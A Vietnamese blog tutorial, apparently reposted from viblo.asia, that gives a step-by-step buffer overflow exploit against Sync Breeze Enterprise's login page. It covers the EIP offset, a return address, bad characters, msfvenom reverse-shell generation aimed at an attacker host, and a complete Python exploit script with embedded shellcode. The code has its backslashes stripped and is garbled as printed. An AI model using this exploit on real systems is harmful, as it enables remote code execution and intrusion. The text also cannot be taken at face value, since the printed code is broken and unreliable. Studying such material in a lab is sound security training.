Khai thác Buffer overflow Sync Breeze Enterprise

Buffer overflow có lẽ là một trong những lỗ hổng nổi tiếng nhất mà bất cứ ai làm về bảo mật cũng từng nghe nói về nó. Điều này cũng thể hiện rõ ràng thông qua các bài viết Viblo nói về chủ đề này. Các bạn có thể tìm hiểu tại đây, tại đây

Buffer overflow có lẽ là một trong những lỗ hổng nổi tiếng nhất mà bất cứ ai làm về bảo mật cũng từng nghe nói về nó. Điều này cũng thể hiện rõ ràng thông qua các bài viết Viblo nói về chủ đề này. Các bạn có thể tìm hiểu tại đây, tại đây hoặc tại đây nữa … đây nữa !!!.

Do đó trong bài viết này, mình sẽ cố gắng không đề cập tới các khái niệm liên quan tới Buffer overflow (điều mình không tự tin) mà trình bày một cách tối giản nhất việc sử dụng lỗ hổng này để khai thác một ứng dụng trong thực tế. Bắt đầu thôi nào !!

1. Chuẩn bị môi trường

Cài đặt

Step 1 : Tắt Window Firewall trên Windows Server

Window Firewall sẽ tự động block các port đáng ngờ ra bên ngoài, vì vậy có thể sẽ cản trở tới việc reverse shell về máy chủ tấn công

Screenshot_3.png

Step 2 : Tắt Window Defender :

Do Shellcode chúng ta inject vào chương trình là malware thuần túy , việc sử dụng Window Defender sẽ ngăn chặn quá trình tấn công và xảy ra hiện tượng “Em làm mãi mà nó không chạy”

Screenshot_4.png

Step 3 : Cài đặt Syncbreezeent

Step 4: Cài đặt Immunity Debugger

Step 5 Load mona module vào Immunity Debugger

Việc load mona module vào Immunity Debugger khá đơn giản , các bạn chỉ cần copy mona.py file bên trên vào đường dẫn C:Program Files (x86)Immunity IncImmunity DebuggerPyCommands là được.

Step 6: Start Service Syncbreezeent

Screenshot_1.png

Step 7: Cấu hình Syncbreezeent

Syncbreezeent mặc định sẽ không “phơi mặt” ra ngoài cho tới khi ta cấu hình tham số Enable WebServer on Port , đồng thời thiết lập kèm username và password

Screenshot_2.png

Nếu cấu hình thành công giao diện chính của Syncbreezeent sẽ hiện ra như sau

Screenshot_5.png

Step 8: Khởi chạy Immunity Debugger với quyền administrator

Step 9: Attach Process Syncbreezeent vào Immunity Debugger

Trong thanh công cụ của Immunity Debugger ta tiến hành chọn File > Attach > Syncbreezeent. Sau khi attach, process sẽ tự dừng, ấn nút Play (bôi đỏ), khi này góc trái màn hình sẽ chuyển từ Pause sang Running

Screenshot_6.png

Lưu ý :

  1. Khi chọn process Syncbreezeent phải chọn Syncbreezeent Enterprise chứ không phải Syncbreezeent Client
  2. Syncbreezeent sau một thời gian sẽ đòi hỏi license, nhưng có thể bỏ qua nó. Chương trình vẫn chạy “phà phà”

2. Khai thác

2.1. Replicating the Crash

Đầu tiên ta Fuzzing 1000 ký tự A để đảm bảo chương trình bị Crash – Buffer Overflow

Code Fuzzing như sau

#!/usr/bin/pythonimport socket
try:print"nSending evil buffer..."
    inputBuffer ="A"*1000
    content ="username="+ inputBuffer +"&password=A"buffer="POST /login HTTP/1.1rn"buffer+="Host: 34.87.176.143rn"buffer+="User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefox/52.0rn"buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn"buffer+="Accept-Language: en-US,en;q=0.5rn"buffer+="Refenrer: http://34.87.176.143:8082/loginrn"buffer+="Connection: closern"buffer+="Content-Type: application/x-www-form-urlencodedrn"buffer+="Content-Length: "+str(len(content))+"rn"buffer+="rn"buffer+= content
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("34.87.176.143",8082))
    s.send(buffer)
    s.close()print"nDone!"except:print"Could not connect!"

Trong đó thay đổi các giá trị Server (34.87.176.143), Port (8082) , size (1000)

Chương trình bị Crash (chuyển từ Running sang Pause trong Immunity Debugger) là thành công. Nếu không thành công, chúng ta cần xét tới 2 trường hợp:

  • Size bạn truyền vào chưa đủ lớn để chương trình bị tràn
  • Bạn cấu hình sai các bước ở trên, dẫn tới chương trình chính không hoạt động

Sau khi xác minh chương trình bị ảnh hưởng bới Buffer Overflow ta có công thức tổng quát cuối cùng để RCE như sau :

inputBuffer = "A" * EIP + "BBBB" + "x90" * 16 + Shellcode 

2.2. Controlling EIP

Tạo 1000 ký tự khác nhau với tính năng pattern_create của metasploit

locate pattern_create 
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000

Screenshot_7.png

Chạy chương trình, code như sau

#!/usr/bin/pythonimport socket
try:print"nSending evil buffer..."#inputBuffer = "A" * 1000
    inputBuffer ="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
    content ="username="+ inputBuffer +"&password=A"buffer="POST /login HTTP/1.1rn"buffer+="Host: 34.87.176.143rn"buffer+="User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefox/52.0rn"buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn"buffer+="Accept-Language: en-US,en;q=0.5rn"buffer+="Referer: http://34.87.176.143:8082/loginrn"buffer+="Connection: closern"buffer+="Content-Type: application/x-www-form-urlencodedrn"buffer+="Content-Length: "+str(len(content))+"rn"buffer+="rn"buffer+= content
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("34.87.176.143",8082))
    s.send(buffer)
    s.close()print"nDone!"except:print"Could not connect!"

Sau khi chạy, ta tìm được giá trị EIP = 42306142

Screenshot_8.png

Chương trình buffer thành công, nhưng hiện tại ta lại chưa biết chính xác bị crash ở điểm nào. Ta sử dụng pattern_offset của metasploit xác định điều này

msf-pattern_offset -l 1000 -q 42306142

Screenshot_9.png

Vậy giá trị EIP trong trường hợp này là 780 !!!

Công thức trở thành

inputBuffer = "A" * 780 + "BBBB" + "x90" * 16 + Shellcode 

2.3. Finding a Return Address

Dùng mona để tìm kiếm chương trình không được bảo vệ bởi ASLR (Khái niệm ASLR ta có thể tìm hiểu tại đây https://en.wikipedia.org/wiki/Address_space_layout_randomization)

!mona modules

PqlScreenshot_3.png

Sử dụng mona modules để tìm Return Address

!mona find -s “xffxe4” -m “libspp.dll”

7NeScreenshot_4.png

Giá trị nhận được là 0x10 09 0c 83

Vậy Return Address sẽ được viết ngược thành 83 9c 09 10 -> x83x0cx09x10

Công thức bây giờ trở thành

inputBuffer = "A" * 780 + "x83x0cx09x10" + "x90" * 16 + Shellcode 

Tạo shellcode với msfvenom

 msfvenom -p windows/shell_reverse_tcp LHOST=hacker.com LPORT=8080 -f c
"x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10"
"x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20"
"x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30"
"x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40"
"x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50"
"x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60"
"x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70"
"x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80"
"x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90"
"x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0"
"xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0"
"xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0"
"xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0"

Shellcode như mô tả ban đầu, sẽ được tạo từ Metasploit Framework, tuy nhiên nếu tạo một cách mặc định shellcode sẽ không chạy do chứa các byte mà chương trình không cho phép. Giống như hạt sạn trong bát cơm, quá trình sau được gọi là “nhặt sạn”

2.4. Checking for Bad Characters

Để tìm Bad Characters thì có khá nhiều cách, nhưng cách thủ công và tốn cơm (và hại mắt) (và mệt mỏi) nhất là ta tiến thành đưa toàn bộ Characters (0x01 tới 0xff) vào chương trình để từ đó tìm ra character cụ thể nào bị loại bỏ (0x00 là null byte nên được mặc định là 1 Bad Character)

All Bad Characters như sau :

badchars = (
"x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10"
"x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20"
"x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30"
"x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40"
"x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50"
"x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60"
"x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70"
"x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80"
"x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90"
"x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0"
"xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0"
"xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0"
"xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0"
"xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0"
"xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0"
"xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff" )

Đưa vào code sẽ trở thành như sau :

#!/usr/bin/pythonimport socket
try:print"nSending evil buffer..."
    
    badchars =("x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10""x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20""x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30""x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40""x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50""x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60""x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70""x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80""x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90""x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0""xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0""xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0""xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0""xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0""xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0""xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff")
    
    inputBuffer ="A"*780+"BBBB"+"CCCC"+ badchars
    content ="username="+ inputBuffer +"&password=A"buffer="POST /login HTTP/1.1rn"buffer+="Host: 34.87.176.143rn"buffer+="User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefox/52.0rn"buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn"buffer+="Accept-Language: en-US,en;q=0.5rn"buffer+="Referer: http://34.87.176.143:8082/loginrn"buffer+="Connection: closern"buffer+="Content-Type: application/x-www-form-urlencodedrn"buffer+="Content-Length: "+str(len(content))+"rn"buffer+="rn"buffer+= content
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("34.87.176.143",8082))
    s.send(buffer)
    s.close()print"nDone!"except:print"Could not connect!"

PgAScreenshot_6.png

Ở đây ta đếm 010203040506070809 xong bắt đầu lỗi , vậy bad chars là 0A

Xóa 0A ta có code

#!/usr/bin/pythonimport socket
try:print"nSending evil buffer..."
    
    badchars =("x01x02x03x04x05x06x07x08x09x0bx0cx0dx0ex0fx10""x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20""x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30""x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40""x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50""x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60""x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70""x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80""x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90""x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0""xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0""xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0""xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0""xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0""xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0""xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff")
    
    inputBuffer ="A"*780+"BBBB"+"CCCC"+ badchars
    content ="username="+ inputBuffer +"&password=A"buffer="POST /login HTTP/1.1rn"buffer+="Host: 34.87.176.143rn"buffer+="User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefox/52.0rn"buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn"buffer+="Accept-Language: en-US,en;q=0.5rn"buffer+="Referer: http://34.87.176.143:8082/loginrn"buffer+="Connection: closern"buffer+="Content-Type: application/x-www-form-urlencodedrn"buffer+="Content-Length: "+str(len(content))+"rn"buffer+="rn"buffer+= content
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("34.87.176.143",8082))
    s.send(buffer)
    s.close()print"nDone!"except:print"Could not connect!"

iYhScreenshot_7.png

Lặp lại quá trình này tới khi không còn thấy bad chars nào nữa ta tìm được

bad char = 00 0A 0D 25 26 2B 3D

2.5. Create shellcode with Metasploit

msfvenom -p windows/shell_reverse_tcp LHOST=34.126.181.39 LPORT=443 -f c –e x86/shikata_ga_nai -b "x00x0ax0dx25x26x2bx3d"
  • shikata_ga_nai là bộ encode payload của metasploit, ngày trước khá xịn nhưng trong môi trường thực tế thì để cho vui
  • Tham số -b ý nói msfvenom tạo cho tôi con shell với thông số này, nhưng làm ơn không sử dụng các ký tự sau “x00x0ax0dx25x26x2bx3d”

Code sau cùng

#!/usr/bin/pythonimport socket
try:print"nSending evil buffer..."
    
    shellcode =("x48x31xc9x48x81xe9xc0xffxffxffx48x8dx05xef""xffxffxffx48xbbx40x76x5ax7bxabx8fx8fxeax48""x31x58x27x48x2dxf8xffxffxffxe2xf4xbcx3exd9""x9fx5bx67x43xeax40x76x1bx2axeaxdfxddxbbx08""x47x88x2dxcexc7x04xb8x20x3exd1x29xb3xc7x04""xb8x60x3exd1x09xfbxc2xbex23x08x79xedx31xe1""xc7xbex2axecx4ax3bx07xa9xa3xafxabx81xbfx57""x3axaax4ex6dx07x12x37x0bx33x20xddxafx61x02""x4ax12x7ax7bxe9x0ex92x58x7dx58x74x2exfdx8f""xeax40xfdxdaxf3xabx8fx8fxa2xc5xb6x2ex1cxe3""x8ex5fx61x08x6ex1exf0xebxafxdfxa3x41xa6xb9""x2dxe6xbex46xa2xbfxbfx1bxf0x9fx07xc7xebx96""x3ex6bxbbx07xcex4ex23x4dx37x5bxbax93x6fxfa""x1bx0cx75x16x5fxa3xcaxb6x3bx35xaex02x3fx20""xcfxabxa3x41xa6x3cx3ax20x83xc7xaexcbx36x46""x32xaax5fxcex61x44xfex1bx23xe3x8ex5fxabx18""x28x03x21xeaxd7xcexb3x01x2cx12xf8x47xafxce""xb8xbfx96x02x3axf2xd5xc7x61x52x9fx11x84x54""x70xd2xa3xfex01x29x49xf4xbcxbdxeax40x37x0c""x32x22x69xc7x6bxacxd6x5bx7bxabxc6x06x0fx09""xcax58x7bxb4x18xadx94xf5x51x1bx2fxe2x06x6b""xa6xc9x87x1bxc1xe7xf8xa9xedxbfxa3x16xf2x41""xe7x8exebx40x76x03x3ax11xa6x0fx81x40x89x8f""x11xa1xcexd1xbax10x3bx6bxb2xe6xbex4fxa2xbf""xb6x12xf2x69xc7x70x2ax08xffx9bx3ax11x65x80""x35xa0x89x8fx33x22x48xe5xfax01x2ex16xf2x49""xc7x06x13x01xccxc3xdexdfxeex70x3fxc5xb6x2e""x71xe2x70x41x9fxa5x9exc9x7bxabx8fxc7x69xac""x66x12xf2x49xc2xbex23x2ax72x1bx23xe3x06x76""xabxfax74x83xb3xf4x70x5ax69xb8x76x24x2exe3""x0cx4bxcax1exffxacx11xebxcexd6x82x40x66x5a""x7bxeaxd7xc7x63xb2x3ex6bxb2xeax35xd7x4ex13""x93xa5xaexe3x06x4cxa3xc9xb1x17x4ax62xc6x06""x1ax08xffx80x33x22x76xcex50x42xafx92x24x54""x5ax0cx12x40x0bx72x23xeaxd8xd6x82x40x36x5a""x7bxeaxd7xe5xeax1ax37xe0x70x84x80xbfx15x95""x21x03x3ax11xfaxe1xa7x21x89x8fx32x54x41x66""xd6xbfx89xa5x33xaax4cxc7xc3x86x3exdfx8dxde""x3bxcex15xa7x2ex30x7bxf2xc6x48x28xb0xc3xf8""x2dx54x5ax8fxea")
    
    inputBuffer ="A"*780+"x83x0cx09x10"+"x90"*16+ shellcode +"x90"*16
    content ="username="+ inputBuffer +"&password=A"buffer="POST /login HTTP/1.1rn"buffer+="Host: 34.87.176.143rn"buffer+="User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefox/52.0rn"buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn"buffer+="Accept-Language: en-US,en;q=0.5rn"buffer+="Referer: http://34.87.176.143:8082/loginrn"buffer+="Connection: closern"buffer+="Content-Type: application/x-www-form-urlencodedrn"buffer+="Content-Length: "+str(len(content))+"rn"buffer+="rn"buffer+= content
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("34.87.176.143",8082))
    s.send(buffer)
    s.close()print"nDone!"except:print"Could not connect!"

2.6. Exploit !!!

Mọi thứ xong xuôi, ta tiến hành chạy mã khai thác (Nếu không chạy, quay trở lại bước 1)

image.png

Nguồn: viblo.asia

Bài viết liên quan

WebP là gì? Hướng dẫn cách để chuyển hình ảnh jpg, png qua webp

WebP là gì? WebP là một định dạng ảnh hiện đại, được phát triển bởi Google

Điểm khác biệt giữa IPv4 và IPv6 là gì?

IPv4 và IPv6 là hai phiên bản của hệ thống địa chỉ Giao thức Internet (IP). IP l

Check nameservers của tên miền xem website trỏ đúng chưa

Tìm hiểu cách check nameservers của tên miền để xác định tên miền đó đang dùn

Mình đang dùng Google Domains để check tên miền hàng ngày

Từ khi thông báo dịch vụ Google Domains bỏ mác Beta, mình mới để ý và bắt đầ